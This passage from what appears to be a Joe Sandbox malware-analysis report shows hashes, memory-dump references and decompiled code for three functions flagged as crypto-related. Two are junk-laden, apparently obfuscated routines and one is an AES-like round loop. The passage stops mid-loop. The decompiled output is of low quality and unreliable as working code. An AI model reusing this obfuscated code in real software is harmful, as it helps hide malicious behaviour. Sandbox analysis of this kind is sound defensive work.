Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID: oRD8
API String ID: 0-2435772424
Opcode ID: 5a1d3b9bd107fadb5021e877d8ba55cf7bd0f515c7627a6551b2b3abc224c85e
Instruction ID: 96e01310dffc6771a91ad01072d838437d3c5ad1cff7fe45edb2e68ca8e50879
Opcode Fuzzy Hash: 5a1d3b9bd107fadb5021e877d8ba55cf7bd0f515c7627a6551b2b3abc224c85e
Instruction Fuzzy Hash: 75C18532828785CFEB16EF39D99A7453FB0F356734B08024EC4A287992DB752526CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0039DD5C Relevance: 1.5, Strings: 1, Instructions: 238
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E0039DD5C(signed int __eax, intOrPtr __ebx, void* __ecx, void* __edx, signed int __edi, void* __esi) {
				signed int _t33;
				void* _t38;

				_t38 = __edx;
				_t33 = __eax ^ 0xd6c21ae9;
				asm("adc cl, 0xd0");
				asm("movsw");
				asm("rol dword [0xf1bbe9d6], 0x39");
				 *0x3023eab3 =  *0x3023eab3 << 0x65;
				 *0xeeda2629 =  *0xeeda2629 | __edi;
				asm("adc esp, 0xf28cb21b");
				 *0x4f100fbe = __edi;
				 *0x1b742908 = __ebx;
				 *0xefcf2495 =  *0xefcf2495 +  *0x1b742908;
				asm("adc eax, [0x6639a9eb]");
				if( *0xefcf2495 > 0) {
					 *0xdb8aeb76 = __ecx;
					 *0xa42e3ff9 =  *0xa42e3ff9 | __ch;
					if( *0xa42e3ff9 != 0) {
						asm("ror dword [0xd9903a74], 0xf8");
						__eax = __eax -  *0x8590fbeb;
						asm("rcr byte [0x2bf308e2], 0x2d");
						_push(0xed2e66fa);
						_t2 = __edx;
						__edx =  *0x510e24d4;
						 *0x510e24d4 = _t2;
						 *0xf726d20d =  *0xf726d20d << 0x8e;
						 *0xb55c5b93 =  *0xb55c5b93 << 0x57;
						__bh = __bh ^  *0xc68e26e7;
						asm("adc ebp, [0xa79f1181]");
						__edx =  *0xa2d48c2f;
						 *0xa2d48c2f =  *0x510e24d4;
						asm("sbb esi, [0x5f4c1321]");
						asm("adc [0x5e10e533], eax");
						asm("sbb dh, [0x920bd6e4]");
						__eax = __eax ^  *0x3553013b;
						 *0x2b6b732 =  *0x2b6b732 << 0xc9;
						 *0xeeb6158f =  *0xeeb6158f << 0x70;
						if( *0xeeb6158f >= 0) {
							__edx = __edx + 0xbcd3bc72;
							__edi = __edi + 0xc45e4595;
							_pop(__ebp);
							 *0x54f934c9 =  *0x54f934c9 | __bl;
							asm("adc esi, 0x61136199");
							__edx = __edx ^ 0xa3a94a83;
							__cl = __cl ^  *0xd39d9c32;
							__esp = __esp |  *0x16bd8819;
							asm("movsw");
							 *0x19c60ae3 =  *0x19c60ae3 ^ __cl;
							asm("lodsd");
							asm("adc bl, 0xb5");
							__edi =  *0x27914069 * 0xb1a8;
							asm("sbb esi, [0x6c17d79b]");
							asm("rol byte [0xc66f7db4], 0x19");
							_push(__eax);
							 *0x79b8688b =  *0x79b8688b & __edx;
							if( *0x79b8688b < 0) {
								__esi =  *0xbcd11f7d * 0x8f02;
								__esp = __esp | 0x2887110f;
								__edi = __edi & 0x37e17666;
								asm("ror dword [0x1516dfa1], 0xdb");
								_push(__ecx);
								asm("stosd");
								asm("sbb ebp, 0xbc1667c2");
								if(__edi == 0) {
									asm("sbb edi, 0x1e8d4b7b");
									asm("stosb");
									__eax =  *0x1ca1f4dc;
									 *0x8051683d = __edx;
									__ch = __ch | 0x000000e5;
									if(__ch < 0) {
										 *0xbb87f79 =  *0xbb87f79 ^ __ecx;
										 *0x27f5ffeb =  *0x27f5ffeb << 0x76;
										__edi = __edi - 0xdb2eed2f;
										 *0xf8f03c6 =  *0xf8f03c6 | __ch;
										_pop( *0xd779c61b);
										__ch =  *0x4593c5e6;
										__edx =  *0xe7e09160 * 0xbf96;
										__ebx = __ebx ^  *0x3cc80c67;
										 *0x4d238100 =  *0x4d238100 << 0xcf;
										L1();
										__ebx = __ebx | 0x4d9960e8;
										 *0xf577050d =  *0xf577050d << 0xd3;
										 *0xa9ce1f63 =  *0xa9ce1f63 << 0x4b;
										_pop(__edx);
										__ebx = __ebx & 0x89a2632e;
										 *0x1f590ba9 =  *0x1f590ba9 >> 0x43;
										 *0x8fc435f2 =  *0x8fc435f2 & __ah;
										if( *0x8fc435f2 >= 0) {
											asm("adc eax, 0x8950278");
											 *0xfffa138f =  *0xfffa138f << 0xb3;
											 *0x733ddf2f =  *0x733ddf2f << 0x99;
											__eax = __eax +  *0xec3d0cc0;
											_push(__ebp);
											__eax = __eax - 1;
											__edi = __edi ^ 0x12ad1167;
											__ebx = __ebx +  *0xb85ca168;
											asm("rol dword [0x2473932e], 0xc0");
											 *0x1dd46626 =  *0x1dd46626 ^ __esp;
											asm("sbb [0x6f3ac66f], ebx");
											asm("sbb [0x5500eda], ebx");
											asm("sbb [0xb0e730d9], ebp");
											 *0xe7d0a2b4 =  *0xe7d0a2b4 >> 0xc9;
											 *0x81c68e26 =  *0x81c68e26 ^ __esp;
											__ebp = __ebp | 0x9f27a194;
											_push(__eax);
											__esi = __esi + 1;
											if(__esi == 0) {
												 *0x226a6c7b =  *0x226a6c7b & __eax;
												__ebx = __ebx + 1;
												if(__ebx < 0) {
													_t12 = __ecx;
													__ecx =  *0xc8761a71;
													 *0xc8761a71 = _t12;
													__edx = __edx + 0xb881871b;
													__edx = __edx -  *0x1ed610ec;
													 *0xa4bfc7f2 =  *0xa4bfc7f2 ^ __bl;
													__esi = __esi |  *0x8b4b72fb;
													 *0xa9d2c53c =  *0xa9d2c53c - 0x12;
													__cl = __cl -  *0xba3487e7;
													asm("rcr byte [0x4410810], 0x4e");
													if(__cl >= 0) {
														asm("sbb cl, [0x40ca633a]");
														if((__ebx & 0x898cfc70) < 0) {
															asm("rcl dword [0xc5a4f973], 0xee");
															_pop(__ecx);
															__edi = __edi |  *0xe7770f16;
															__edi = __edi ^ 0x0938d23f;
															 *0xe9e06e15 =  *0xe9e06e15 + __edx;
															 *0xfad3a8f4 =  *0xfad3a8f4 >> 0xce;
															_pop(__ebx);
															 *0x75a93d19 = __ebp;
															if( *0xfad3a8f4 == 0) {
																__ebp =  *0x8414b87a;
																__edi = __edi | 0x2f39ec68;
																 *0x89414fba =  *0x89414fba - __ebx;
																_push( *0x9d663bc);
																_t15 = __eax;
																__eax =  *0xe7a9d2c7;
																 *0xe7a9d2c7 = _t15;
																asm("adc ebx, 0x8ba3487");
																 *0xccb1e422 =  *0xccb1e422 << 0x51;
																__ebp =  *0x8414b87a | 0x24db0116;
																 *0x52db7420 =  *0x52db7420 << 0x20;
																 *0x1e2465a8 =  *0x1e2465a8 - __cl;
																if(__ecx != 0) {
																	__esi = __esi -  *0xecd22574;
																	_t16 = __ebx;
																	__ebx =  *0x8d3ffac4;
																	 *0x8d3ffac4 = _t16;
																	_push(0xd44a8a8e);
																	__esi =  *0x4a2cf413;
																	__ebx =  *0x8d3ffac4 ^ 0xb3b96e67;
																	asm("movsw");
																	__edi = __edi ^ 0x4b7fb811;
																	asm("movsb");
																	if(__edi != 0) {
																		__edx = __edx |  *0xe3e00774;
																		asm("ror byte [0x8f93942c], 0x4d");
																		_pop(__edx);
																		__edi = __edi |  *0xd6e87e37;
																		__edx = __edx &  *0xea606417;
																		__edx = __edx - 1;
																		asm("sbb edx, [0x70721a87]");
																		asm("sbb al, 0x4");
																		if((__ebp & 0xdb833ed9) <= 0) {
																			__ecx =  *0x357dca7f * 0x3bd8;
																			__ebp = __ebp &  *0xffd3d099;
																			if(__ebp == 0) {
																				__esp = __esp -  *0xbeab5175;
																				__edi = 0xe15c9536;
																				asm("adc edi, [0x194d7c26]");
																				_pop( *0x3ddf6fea);
																				asm("rcl byte [0x949bb500], 0x22");
																				 *0x7e7f60e6 =  *0x7e7f60e6 << 0xda;
																				__edx = __edx + 1;
																				asm("sbb esp, [0x69d956c7]");
																				__ebp = __ebx;
																				 *0xd9150b30 =  *0xd9150b30 - __dh;
																				asm("cmpsw");
																				 *0xaf4180e =  *0xaf4180e >> 0xaf;
																				if( *0xaf4180e <= 0) {
																					__ebp = __ebp | 0x8f0a9777;
																					__bh =  *0xc92734b5;
																					if(0x12 < 0) {
																						__esp =  *0x10818779;
																						__cl = __cl - 0xe4;
																						__esp =  *0x10818779 |  *0xe9a43a8e;
																						 *0xb72423d7 =  *0xb72423d7 >> 0x2c;
																						__ah = __ah | 0x000000c9;
																						_pop(__ecx);
																						 *0x45c2490c =  *0x45c2490c + __al;
																						__edi = 0x61508012;
																						L1();
																						_pop( *0x8f7012e8);
																						__ebp = __ebp - 1;
																						asm("adc edx, [0x55b9b911]");
																						asm("rol dword [0xf61c6d9a], 0x97");
																						asm("sbb edx, [0x4f7029f1]");
																						asm("scasb");
																						__edx = __edx &  *0x1fdca1bc;
																						 *0xba86bc35 =  *0xba86bc35 << 0x54;
																						asm("sbb edx, [0xadd51567]");
																						 *0x1ab19732 =  *0x1ab19732 >> 0x17;
																						if( *0xba86bc35 < 0) {
																							__esi =  *0xb052397d * 0xcccd;
																							__ebx =  *0x9f823760 * 0x7f86;
																							asm("sbb ebx, [0xe61a115]");
																							__ecx = __ecx ^  *0x93244792;
																							 *0xe51f3062 =  *0xe51f3062 & __eax;
																							 *0x81c68e26 =  *0x81c68e26 |  *0xb052397d * 0x0000cccd;
																							 *0xb037b414 =  *0xb037b414 << 0x90;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				asm("rol dword [0x24619c09], 0x46");
				L1();
				asm("adc ebp, [0xc54d0de8]");
				 *0x7ab7dbce =  *0x7ab7dbce >> 0x79;
				 *0x608c03c =  *0x608c03c + _t38 - 0x31c1a2c1;
				return _t33 + 1;
			}

0x0039dd5c
0x0039dd5c
0x0039dd61
0x0039dd64
0x0039dd66
0x0039dd6d
0x0039dd74
0x0039dd7a
0x0039dd80
0x0039dd87
0x0039dd8d
0x0039dd93
0x0039dd99
0x0039dd9f
0x0039dda5
0x0039ddab
0x0039ddb1
0x0039ddb8
0x0039ddbe
0x0039ddc5
0x0039ddca
0x0039ddca
0x0039ddca
0x0039ddd0
0x0039ddd7
0x0039ddde
0x0039dde4
0x0039ddea
0x0039ddea
0x0039ddf0
0x0039ddf9
0x0039ddff
0x0039de05
0x0039de0e
0x0039de15
0x0039de1c
0x0039de22
0x0039de28
0x0039de34
0x0039de35
0x0039de3b
0x0039de41
0x0039de47
0x0039de4d
0x0039de53
0x0039de55
0x0039de5b
0x0039de5e
0x0039de61
0x0039de6b
0x0039de71
0x0039de7e
0x0039de7f
0x0039de85
0x0039de8b
0x0039de95
0x0039de9b
0x0039dea1
0x0039dea8
0x0039dea9
0x0039deaa
0x0039deb0
0x0039deb6
0x0039debc
0x0039dec3
0x0039dec8
0x0039dece
0x0039ded1
0x0039ded7
0x0039dedd
0x0039dee4
0x0039deea
0x0039def0
0x0039def6
0x0039defc
0x0039df06
0x0039df0f
0x0039df17
0x0039df1c
0x0039df22
0x0039df29
0x0039df30
0x0039df31
0x0039df37
0x0039df3e
0x0039df44
0x0039df4a
0x0039df4f
0x0039df5c
0x0039df63
0x0039df69
0x0039df6a
0x0039df6b
0x0039df71
0x0039df77
0x0039df7e
0x0039df87
0x0039df8d
0x0039df93
0x0039df99
0x0039dfa0
0x0039dfac
0x0039dfb2
0x0039dfb3
0x0039dfb4
0x0039dfba
0x0039dfc0
0x0039dfc1
0x0039dfc7
0x0039dfc7
0x0039dfc7
0x0039dfcd
0x0039dfd6
0x0039dfdc
0x0039dfe2
0x0039dfe8
0x0039dfee
0x0039dff4
0x0039dffb
0x0039e007
0x0039e00d
0x0039e013
0x0039e01a
0x0039e01b
0x0039e021
0x0039e027
0x0039e02d
0x0039e034
0x0039e035
0x0039e03b
0x0039e041
0x0039e047
0x0039e04d
0x0039e053
0x0039e059
0x0039e059
0x0039e059
0x0039e05f
0x0039e065
0x0039e06c
0x0039e072
0x0039e079
0x0039e085
0x0039e08b
0x0039e091
0x0039e091
0x0039e091
0x0039e097
0x0039e09c
0x0039e0a2
0x0039e0a8
0x0039e0aa
0x0039e0b0
0x0039e0b1
0x0039e0b7
0x0039e0bd
0x0039e0c4
0x0039e0c5
0x0039e0cb
0x0039e0d1
0x0039e0d2
0x0039e0de
0x0039e0e0
0x0039e0e6
0x0039e0f0
0x0039e0fa
0x0039e100
0x0039e106
0x0039e10b
0x0039e111
0x0039e117
0x0039e11e
0x0039e12b
0x0039e12d
0x0039e136
0x0039e137
0x0039e13d
0x0039e13f
0x0039e146
0x0039e14c
0x0039e158
0x0039e15e
0x0039e164
0x0039e16a
0x0039e16d
0x0039e17c
0x0039e183
0x0039e186
0x0039e187
0x0039e18d
0x0039e193
0x0039e198
0x0039e19e
0x0039e19f
0x0039e1a5
0x0039e1ac
0x0039e1b2
0x0039e1c5
0x0039e1cb
0x0039e1d2
0x0039e1d8
0x0039e1df
0x0039e1e5
0x0039e1ef
0x0039e1f9
0x0039e1ff
0x0039e205
0x0039e211
0x0039e217
0x0039e21e
0x0039e1df
0x0039e15e
0x0039e146
0x0039e0fa
0x0039e0e0
0x0039e0b1
0x0039e085
0x0039e03b
0x0039e00d
0x0039dffb
0x0039dfc1
0x0039dfb4
0x0039df44
0x0039ded1
0x0039deb0
0x0039de85
0x0039de1c
0x0039ddab
0x0039d596
0x0039d5a4
0x0039d5a9
0x0039d5af
0x0039d5b6
0x0039d5bc

Strings

2, xrefs: 0039DF84

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 092dd346b6d46f6fbb9f7c1769c062ac94ebb93108abdbc3fc803e4b770b7def
Instruction ID: fa16f216d9ef8b55b8554f1f13d7b6627fc64510aabbf846a9f2df3557afb6ea
Opcode Fuzzy Hash: 092dd346b6d46f6fbb9f7c1769c062ac94ebb93108abdbc3fc803e4b770b7def
Instruction Fuzzy Hash: 31B14072818385CFEB02CF34D88AB013FB1F39A3A8B49435EC5A29B5E1C3342519CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0039DA11 Relevance: 1.4, Strings: 1, Instructions: 159
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E0039DA11(signed int __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, signed int __esi) {
				signed int _t31;
				signed int _t32;
				signed int _t34;
				signed int _t44;
				intOrPtr _t52;
				void* _t53;

				asm("adc ebx, [0x89912dcc]");
				 *0x9915b325 =  *0x9915b325 >> 0xe4;
				asm("rol dword [0xb81be505], 0x5d");
				asm("adc [0x505991d], ebp");
				 *0x3b150599 =  *0x3b150599 & __esi;
				_push( *0xcd900399);
				 *0x220486a3 =  *0x220486a3 + __edi;
				asm("rcl byte [0x4869cca], 0xbe");
				asm("adc ch, [0xa4bdfb04]");
				_t44 = (__ecx ^  *0xa888f816) &  *0x27b204f9 | 0x00000086;
				 *0xdd17ea05 =  *0x86a6c48c;
				 *0x3e059930 =  *0x3e059930 | _t44;
				asm("rcl dword [0x9926ca03], 0xd4");
				 *0x62079928 =  *0x62079928 - _t44;
				asm("adc ebx, [0x124007f8]");
				asm("adc [0xa4fd45ee], eax");
				_push(__esi);
				 *0x115aee6f =  *0x115aee6f >> 0x52;
				 *0xe3910f1c =  *0xe3910f1c << 0x3f;
				 *0x24e76bec =  *0x24e76bec << 0x37;
				_t52 =  *0xcbff5208;
				 *0xd2f81a26 =  *0xd2f81a26 - _t52;
				 *0x57d0bd61 =  *0x57d0bd61 & 0x000000a0;
				_pop( *0x150924db);
				_t31 = ((__eax | 0x12be30ed) ^  *0xe82013a0) &  *0x108cc181;
				 *0xbe09e818 =  *0xbe09e818 - _t31;
				 *0xb230c7fb =  *0xb230c7fb | 0x000000a0;
				 *0xa0174e0a = (_t44 ^  *0x1705a20f ^ 0x2db1c209) &  *0xe82731a8;
				_t32 = _t31 &  *0x4d687a06;
				asm("ror byte [0xb818f32], 0xe6");
				 *0xa748bad9 =  *0xa748bad9 >> 0xe7;
				 *0x738570b5 =  *0x738570b5 >> 0x33;
				 *0x88f02c0 =  *0x88f02c0 + _t52;
				 *0x1aaf5ee =  *0x1aaf5ee | 0x000000a0;
				 *0xcef588bf =  *0xcef588bf << 0xdc;
				asm("sbb [0x847f6c20], dl");
				 *0xf75214d6 =  *0xf75214d6 + _t32;
				asm("adc bh, 0x34");
				_t34 = _t32 | 0xbb2222ea |  *0x22e9b4ed;
				 *0xeeb312ba =  *0xeeb312ba | _t34;
				asm("adc [0x5374eb9e], ebp");
				 *0x21c3a3f3 =  *0x21c3a3f3 | 0x000000a0;
				 *0x28013bde =  *0x28013bde -  *0xac38ae6a * 0x8f8;
				_pop(_t53);
				asm("adc esi, 0xc477c19a");
				asm("sbb edi, 0x448e5896");
				 *0x68f0fa0 =  *0x68f0fa0 >> 0x9f;
				if(( *0xbda5901 & __edi +  *0x824c9ce + 0x24d3fa16) < 0) {
					asm("adc edi, 0x32063d79");
					 *0xab0cd767 =  *0xab0cd767 << 0x87;
					 *0x9bec6bfa =  *0x9bec6bfa & __edi;
					asm("sbb esp, [0xb1074d1f]");
					__ebp = __ebp + 1;
					__ah = __ah ^  *0xe7c152f6;
					__ecx = __ecx +  *0x52d616f8;
					asm("rol byte [0x3f5bdfb0], 0x6e");
					asm("rcl dword [0x40d67d93], 0x72");
					 *0x8d05b3ba =  *0x8d05b3ba | 0x09946b68;
					__eax = __eax ^  *0xb8dbe1ba;
					asm("sbb bl, [0x521738f6]");
					asm("adc dl, 0x63");
					if(__edi ==  *0x3b7a3798) {
						__ecx = 0xd625bb75;
						asm("adc cl, [0x1cc6421c]");
						_pop( *0x83258e39);
						__ebp =  *0xb586d929;
						asm("lodsd");
						__bl = __bl - 0xe2;
						 *0x37ca8eb9 =  *0x37ca8eb9 >> 0x24;
						L1();
						__ebx = __ebx | 0x16dcb3e8;
						 *0x5fdf582 = __al;
						asm("adc esp, 0x59fa4eb9");
						asm("sbb cl, [0x70682422]");
						__edi = __edi - 0x4d6e0b81;
						__ebp = 0xf2574b93;
						 *0x5d6a02d6 =  *0x5d6a02d6 >> 0x4a;
						__edx = __edx -  *0xd3c4929d;
						asm("sbb edx, 0xfc77f79c");
						__esi = 0x34368fdd;
						asm("movsb");
						asm("rcr byte [0x490dded0], 0x77");
						asm("sbb [0x413ee312], al");
						 *0x194b31c6 =  *0x194b31c6 << 0;
						asm("rol dword [0x525601d8], 0xbc");
						__ebx = 0x6d1cd621;
						__esi = 0xffffffffdb8a1043;
						__ebp = 0x18f0f28b;
						__eax = 0xff68dc1b;
						asm("ror dword [0x71a7166d], 0xb8");
						_pop( *0x49969393);
						__ebp = 0xfffffffff2574b94;
						 *0x9aeba622 =  *0x9aeba622 - __dl;
						__ecx = 0xd625bb75 &  *0xbfc60e39;
						__ebx = 0x28096dd9;
						asm("sbb [0xf7fe1062], ecx");
						asm("rcl dword [0x49053da9], 0xc7");
						__edi = __edi - 1;
						asm("adc edx, [0x8ed410b8]");
						 *0x6335e18d =  *0x6335e18d + 0x9946b68;
						asm("rcl byte [0xd62282e3], 0xdd");
						asm("adc [0xece0b419], ecx");
						_push(0x8eebfdcc);
					}
				}
				asm("rol dword [0x24619c09], 0x46");
				L1();
				asm("adc ebp, [0xc54d0de8]");
				 *0x7ab7dbce =  *0x7ab7dbce >> 0x79;
				 *0x608c03c =  *0x608c03c + _t53 - 0x31c1a2c1;
				return _t34 + 1;
			}

0x0039da17
0x0039da23
0x0039da2a
0x0039da31
0x0039da43
0x0039da55
0x0039da61
0x0039da67
0x0039da74
0x0039da7a
0x0039da7d
0x0039da83
0x0039da89
0x0039da96
0x0039daa4
0x0039dab6
0x0039dacc
0x0039dacd
0x0039dada
0x0039dae1
0x0039dae8
0x0039daee
0x0039dafa
0x0039db00
0x0039db18
0x0039db1e
0x0039db24
0x0039db30
0x0039db36
0x0039db3c
0x0039db43
0x0039db4a
0x0039db51
0x0039db57
0x0039db6a
0x0039db71
0x0039db7d
0x0039db88
0x0039db91
0x0039db9d
0x0039dba3
0x0039dba9
0x0039dbaf
0x0039dbb5
0x0039dbbc
0x0039dbc2
0x0039dbc8
0x0039dbcf
0x0039dbd5
0x0039dbdb
0x0039dbe8
0x0039dbef
0x0039dbf5
0x0039dbf6
0x0039dbfc
0x0039dc02
0x0039dc09
0x0039dc10
0x0039dc1c
0x0039dc2f
0x0039dc35
0x0039dc38
0x0039dc3e
0x0039dc43
0x0039dc49
0x0039dc55
0x0039dc60
0x0039dc61
0x0039dc64
0x0039dc77
0x0039dc7c
0x0039dc82
0x0039dc87
0x0039dc8d
0x0039dc99
0x0039dc9f
0x0039dcaa
0x0039dcb1
0x0039dcb7
0x0039dcbd
0x0039dcc3
0x0039dcc4
0x0039dcd1
0x0039dcd7
0x0039dcde
0x0039dce5
0x0039dceb
0x0039dcf1
0x0039dcf2
0x0039dcf7
0x0039dcfe
0x0039dd04
0x0039dd05
0x0039dd11
0x0039dd18
0x0039dd1e
0x0039dd2a
0x0039dd31
0x0039dd32
0x0039dd38
0x0039dd3e
0x0039dd45
0x0039dd51
0x0039dd51
0x0039dc38
0x0039d596
0x0039d5a4
0x0039d5a9
0x0039d5af
0x0039d5b6
0x0039d5bc

Strings

/Lz, xrefs: 0039DB77

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID: /Lz
API String ID: 0-2861173035
Opcode ID: aa92981e7ba435b8f194fb93b77a09b21e92044544689a33c5db77c0ee5d7307
Instruction ID: 7d1aef7dfa562bceacaad7bd0813018dad076cb2eb645931283a92fa5a1d30c4
Opcode Fuzzy Hash: aa92981e7ba435b8f194fb93b77a09b21e92044544689a33c5db77c0ee5d7307
Instruction Fuzzy Hash: 7A815372A097C9CFC302CF38DC9A6023FB1F756360B49465ED8A287582E7382529DF85

Uniqueness

Uniqueness Score: -1.00%

Function 00382FB0 Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E00382FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t411;
				signed int _t428;
				signed int _t457;
				signed int _t477;
				signed int _t559;
				signed int _t602;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t457 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t457;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t428 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t602 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t477 = (_a4 >> 1) - 1;
				_a4 = _t477;
				if(_t477 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t559 =  *(__eax + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t428 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t559 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t602 =  *(__eax + 4 + (_t559 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t559;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t559 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
